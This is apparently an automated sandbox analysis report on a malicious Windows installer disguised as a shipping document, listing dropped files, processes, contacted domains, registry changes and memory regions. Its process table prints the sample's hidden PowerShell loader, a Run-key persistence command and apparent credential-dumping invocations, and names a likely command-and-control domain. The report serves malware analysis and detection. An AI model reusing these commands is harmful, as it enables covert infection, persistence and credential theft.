Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
586 R1 M-LINE - GEORGIA 03.05.2024.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151\586 R1 M-LINE - GEORGIA 03.05.2024.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Glathvls\rotorklipper\Ergotoxine\Oxaloacetic.Arc
|
ASCII text, with very long lines (58092), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\fvberms.dat
|
data
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_97e616d2-0c12-4c74-9aa1-5942bf5533cd\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_a84e9785-c8fa-4ffb-97f7-c80ae546c113\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_c64b981f-f333-41a5-af73-c2444e46bfa6\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_e43dba7a-2656-4838-b4e7-c6c5a8b56b61\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_ebcd1d5a-ef39-4e27-b678-5c312fcdc338\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_f94f936b-b220-4900-bcdd-21d10c4473ec\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_f9afd325-82b1-4ddd-aab9-a0b1f6266b70\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER73C1.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER744E.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER745D.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER746C.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER74CB.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7558.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8CC7.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8CE7.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC54C.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC55B.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC57B.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC5E9.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC609.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC657.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\WER6316.tmp.WERDataCollectionStatus.txt
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\WER6420.tmp.WERDataCollectionStatus.txt
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\WER644E.tmp.WERDataCollectionStatus.txt
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\WER7863.tmp.WERDataCollectionStatus.txt
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\WERB126.tmp.WERDataCollectionStatus.txt
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\WERB136.tmp.WERDataCollectionStatus.txt
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\WERB184.tmp.WERDataCollectionStatus.txt
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0m0rzv4l.f44.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3sdhzpiz.w3v.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\nsi6C91.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Demigrate\refills.txt
|
ASCII text, with very long lines (306), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Distributionsrettighederne\gatfinnernes.tel
|
DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration:
offset 0.000000, slope 0.000122
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Distributionsrettighederne\menja.lam
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151\586 R1 M-LINE - GEORGIA 03.05.2024.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151\spejderlejrene.hum
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Knappet\Depotindehaveren\Politurs\Springsttternes\Overheld.Akt
|
data
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
There are 34 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe
|
"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Glathvls\rotorklipper\Ergotoxine\Oxaloacetic.Arc';$Brikvvningernes=$Respireredes.SubString(58067,3);.$Brikvvningernes($Respireredes)"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ
/d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)"
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle
minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sreexoebkgcaarsayfwsrzyyowbcnlfz"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtkx"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\fnphyzzx"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xtjcxb"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hvonqtlzm"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sptgqmvszidsb"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zaaaovlz"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\juftpowalcj"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mxslqghuzktmmh"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\owkrpbswynspxwny"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yyxcqtdymwkuzcbcqpf"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 12
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 6672 -s 12
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 12
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 5164 -s 12
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 4128 -s 12
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 12
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 12
|
There are 20 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
|
|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
learfo55ozj02.duckdns.org
|
|
||
|
https://enelltd.top/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://geoplugin.net/json.gpf
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
http://geoplugin.net/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://geoplugin.net/json.gpm
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://upx.sf.net
|
unknown
|
||
|
https://aka.ms/pscore6lBkq
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 9 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
learfo55ozj02.duckdns.org
|
193.222.96.21
|
|
|
|
enelltd.top
|
172.67.215.46
|
||
|
geoplugin.net
|
178.237.33.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
193.222.96.21
|
learfo55ozj02.duckdns.org
|
Germany
|
|
|
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
172.67.215.46
|
enelltd.top
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\kvidret
|
Unemancipated
|
||
|
HKEY_CURRENT_USER\Environment
|
Scrippage
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jmofvnb-6GMGJI
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jmofvnb-6GMGJI
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jmofvnb-6GMGJI
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Unthematic
|
||
|
\REGISTRY\A\{cb39ddbe-ecd3-6af7-1e8b-3d84058456d3}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
ProgramId
|
||
|
\REGISTRY\A\{cb39ddbe-ecd3-6af7-1e8b-3d84058456d3}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
FileId
|
||
|
\REGISTRY\A\{cb39ddbe-ecd3-6af7-1e8b-3d84058456d3}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
LowerCaseLongPath
|
||
|
\REGISTRY\A\{cb39ddbe-ecd3-6af7-1e8b-3d84058456d3}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
LongPathHash
|
||
|
\REGISTRY\A\{cb39ddbe-ecd3-6af7-1e8b-3d84058456d3}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
Name
|
||
|
\REGISTRY\A\{cb39ddbe-ecd3-6af7-1e8b-3d84058456d3}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
OriginalFileName
|
||
|
\REGISTRY\A\{cb39ddbe-ecd3-6af7-1e8b-3d84058456d3}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
Publisher
|
||
|
\REGISTRY\A\{cb39ddbe-ecd3-6af7-1e8b-3d84058456d3}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
Version
|
||
|
\REGISTRY\A\{cb39ddbe-ecd3-6af7-1e8b-3d84058456d3}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
BinFileVersion
|
||
|
\REGISTRY\A\{cb39ddbe-ecd3-6af7-1e8b-3d84058456d3}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
BinaryType
|
||
|
\REGISTRY\A\{cb39ddbe-ecd3-6af7-1e8b-3d84058456d3}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
ProductName
|
||
|
\REGISTRY\A\{cb39ddbe-ecd3-6af7-1e8b-3d84058456d3}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
ProductVersion
|
||
|
\REGISTRY\A\{cb39ddbe-ecd3-6af7-1e8b-3d84058456d3}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
LinkDate
|
||
|
\REGISTRY\A\{cb39ddbe-ecd3-6af7-1e8b-3d84058456d3}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
BinProductVersion
|
||
|
\REGISTRY\A\{cb39ddbe-ecd3-6af7-1e8b-3d84058456d3}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
AppxPackageFullName
|
||
|
\REGISTRY\A\{cb39ddbe-ecd3-6af7-1e8b-3d84058456d3}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
AppxPackageRelativeId
|
||
|
\REGISTRY\A\{cb39ddbe-ecd3-6af7-1e8b-3d84058456d3}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
Size
|
||
|
\REGISTRY\A\{cb39ddbe-ecd3-6af7-1e8b-3d84058456d3}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
Language
|
||
|
\REGISTRY\A\{cb39ddbe-ecd3-6af7-1e8b-3d84058456d3}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
IsOsComponent
|
||
|
\REGISTRY\A\{cb39ddbe-ecd3-6af7-1e8b-3d84058456d3}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
Usn
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
|
0018800EE76D7D76
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceTicket
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
|
0018800EE76D7D76
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceTicket
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
|
0018800EE76D7D76
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceTicket
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceId
|
There are 25 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5567000
|
heap
|
page read and write
|
|
|
|
5579000
|
heap
|
page read and write
|
|
|
|
5575000
|
heap
|
page read and write
|
|
|
|
9858000
|
direct allocation
|
page execute and read and write
|
|
|
|
20EDF000
|
stack
|
page read and write
|
||
|
4A91000
|
trusted library allocation
|
page read and write
|
||
|
221FF000
|
unclassified section
|
page execute and read and write
|
||
|
20C80000
|
unclassified section
|
page execute and read and write
|
||
|
45A000
|
unkown
|
page readonly
|
||
|
4008000
|
remote allocation
|
page execute and read and write
|
||
|
7222000
|
heap
|
page read and write
|
||
|
21570000
|
heap
|
page read and write
|
||
|
7330000
|
trusted library allocation
|
page read and write
|
||
|
7520000
|
trusted library allocation
|
page read and write
|
||
|
20D7F000
|
stack
|
page read and write
|
||
|
6B80000
|
direct allocation
|
page read and write
|
||
|
C20000
|
trusted library allocation
|
page read and write
|
||
|
AA9000
|
heap
|
page read and write
|
||
|
24AC000
|
stack
|
page read and write
|
||
|
72F0000
|
trusted library allocation
|
page read and write
|
||
|
2145D000
|
stack
|
page read and write
|
||
|
7310000
|
trusted library allocation
|
page read and write
|
||
|
7213000
|
heap
|
page read and write
|
||
|
21D3F000
|
unclassified section
|
page execute and read and write
|
||
|
C24000
|
trusted library allocation
|
page read and write
|
||
|
299C000
|
stack
|
page read and write
|
||
|
31F0000
|
heap
|
page read and write
|
||
|
29FC000
|
stack
|
page read and write
|
||
|
6C30000
|
heap
|
page execute and read and write
|
||
|
5A91000
|
trusted library allocation
|
page read and write
|
||
|
20610000
|
direct allocation
|
page read and write
|
||
|
7FD10000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FAE000
|
stack
|
page read and write
|
||
|
6F3000
|
heap
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
23E0000
|
heap
|
page read and write
|
||
|
6BD0000
|
direct allocation
|
page read and write
|
||
|
4A89000
|
heap
|
page read and write
|
||
|
29F0000
|
heap
|
page read and write
|
||
|
9DD000
|
stack
|
page read and write
|
||
|
C70000
|
trusted library allocation
|
page read and write
|
||
|
845C000
|
heap
|
page read and write
|
||
|
74F0000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
7480000
|
trusted library allocation
|
page read and write
|
||
|
6B0000
|
heap
|
page read and write
|
||
|
5FD000
|
stack
|
page read and write
|
||
|
22196000
|
unclassified section
|
page execute and read and write
|
||
|
29DC000
|
stack
|
page read and write
|
||
|
AF7000
|
heap
|
page read and write
|
||
|
20630000
|
direct allocation
|
page read and write
|
||
|
A50000
|
heap
|
page read and write
|
||
|
20660000
|
direct allocation
|
page read and write
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
8000000
|
trusted library allocation
|
page execute and read and write
|
||
|
5886000
|
heap
|
page read and write
|
||
|
281B000
|
heap
|
page read and write
|
||
|
223A2000
|
unclassified section
|
page execute and read and write
|
||
|
D10000
|
heap
|
page readonly
|
||
|
A9E000
|
heap
|
page read and write
|
||
|
2109C000
|
stack
|
page read and write
|
||
|
21E30000
|
unclassified section
|
page execute and read and write
|
||
|
210DC000
|
stack
|
page read and write
|
||
|
422000
|
system
|
page execute and read and write
|
||
|
2115F000
|
stack
|
page read and write
|
||
|
70D2000
|
heap
|
page read and write
|
||
|
55B7000
|
heap
|
page read and write
|
||
|
54D0000
|
heap
|
page readonly
|
||
|
2248F000
|
unclassified section
|
page execute and read and write
|
||
|
21819000
|
heap
|
page read and write
|
||
|
2235F000
|
unclassified section
|
page execute and read and write
|
||
|
2A4E000
|
stack
|
page read and write
|
||
|
7470000
|
trusted library allocation
|
page read and write
|
||
|
2135F000
|
stack
|
page read and write
|
||
|
B1C000
|
heap
|
page read and write
|
||
|
5C3D000
|
trusted library allocation
|
page read and write
|
||
|
5840000
|
direct allocation
|
page read and write
|
||
|
8020000
|
trusted library allocation
|
page read and write
|
||
|
2B50000
|
heap
|
page read and write
|
||
|
4A7E000
|
stack
|
page read and write
|
||
|
550000
|
heap
|
page read and write
|
||
|
232D000
|
stack
|
page read and write
|
||
|
555D000
|
heap
|
page read and write
|
||
|
224A0000
|
unclassified section
|
page execute and read and write
|
||
|
71C0000
|
heap
|
page read and write
|
||
|
2125E000
|
stack
|
page read and write
|
||
|
828C000
|
stack
|
page read and write
|
||
|
7EE000
|
stack
|
page read and write
|
||
|
C23000
|
trusted library allocation
|
page execute and read and write
|
||
|
356F000
|
stack
|
page read and write
|
||
|
85B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21390000
|
unclassified section
|
page execute and read and write
|
||
|
2121C000
|
stack
|
page read and write
|
||
|
A55000
|
heap
|
page read and write
|
||
|
71E8000
|
heap
|
page read and write
|
||
|
20E30000
|
direct allocation
|
page read and write
|
||
|
21BF0000
|
unclassified section
|
page execute and read and write
|
||
|
5830000
|
direct allocation
|
page read and write
|
||
|
2810000
|
heap
|
page read and write
|
||
|
9C0000
|
heap
|
page read and write
|
||
|
490D000
|
stack
|
page read and write
|
||
|
706E000
|
stack
|
page read and write
|
||
|
C2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4A80000
|
heap
|
page read and write
|
||
|
A70000
|
heap
|
page read and write
|
||
|
7460000
|
trusted library allocation
|
page read and write
|
||
|
20E40000
|
direct allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
8030000
|
trusted library allocation
|
page read and write
|
||
|
20FC0000
|
remote allocation
|
page read and write
|
||
|
BC0000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
4A3E000
|
stack
|
page read and write
|
||
|
82CE000
|
stack
|
page read and write
|
||
|
21ED2000
|
unclassified section
|
page execute and read and write
|
||
|
20FC0000
|
heap
|
page read and write
|
||
|
7F10000
|
trusted library allocation
|
page execute and read and write
|
||
|
8010000
|
trusted library allocation
|
page read and write
|
||
|
21BE6000
|
unclassified section
|
page execute and read and write
|
||
|
85C0000
|
direct allocation
|
page execute and read and write
|
||
|
80A0000
|
trusted library allocation
|
page read and write
|
||
|
5BD000
|
stack
|
page read and write
|
||
|
2354000
|
heap
|
page read and write
|
||
|
3570000
|
heap
|
page read and write
|
||
|
21C60000
|
unclassified section
|
page execute and read and write
|
||
|
824C000
|
stack
|
page read and write
|
||
|
5682000
|
unclassified section
|
page execute and read and write
|
||
|
996000
|
heap
|
page read and write
|
||
|
20A8E000
|
stack
|
page read and write
|
||
|
83AA000
|
heap
|
page read and write
|
||
|
20FC0000
|
remote allocation
|
page read and write
|
||
|
6C35000
|
heap
|
page execute and read and write
|
||
|
9CE000
|
stack
|
page read and write
|
||
|
C00000
|
trusted library section
|
page read and write
|
||
|
476000
|
system
|
page execute and read and write
|
||
|
73FE000
|
stack
|
page read and write
|
||
|
74C0000
|
trusted library allocation
|
page read and write
|
||
|
6B0E000
|
stack
|
page read and write
|
||
|
6BC0000
|
direct allocation
|
page read and write
|
||
|
7F30000
|
heap
|
page read and write
|
||
|
C30000
|
trusted library allocation
|
page read and write
|
||
|
434000
|
unkown
|
page read and write
|
||
|
23DE000
|
unkown
|
page read and write
|
||
|
980000
|
heap
|
page read and write
|
||
|
258C000
|
stack
|
page read and write
|
||
|
5AF9000
|
trusted library allocation
|
page read and write
|
||
|
6BA0000
|
direct allocation
|
page read and write
|
||
|
7F20000
|
trusted library allocation
|
page read and write
|
||
|
220A6000
|
unclassified section
|
page execute and read and write
|
||
|
45F000
|
system
|
page execute and read and write
|
||
|
427000
|
unkown
|
page read and write
|
||
|
213B2000
|
unclassified section
|
page execute and read and write
|
||
|
834E000
|
stack
|
page read and write
|
||
|
21C4F000
|
unclassified section
|
page execute and read and write
|
||
|
3270000
|
remote allocation
|
page read and write
|
||
|
8E58000
|
direct allocation
|
page execute and read and write
|
||
|
20620000
|
direct allocation
|
page read and write
|
||
|
75A7000
|
trusted library allocation
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
20A4E000
|
stack
|
page read and write
|
||
|
6BB0000
|
direct allocation
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
6E90000
|
heap
|
page read and write
|
||
|
20F2E000
|
stack
|
page read and write
|
||
|
20B0C000
|
stack
|
page read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
2100E000
|
stack
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
21F80000
|
unclassified section
|
page execute and read and write
|
||
|
205D0000
|
direct allocation
|
page read and write
|
||
|
7440000
|
trusted library allocation
|
page read and write
|
||
|
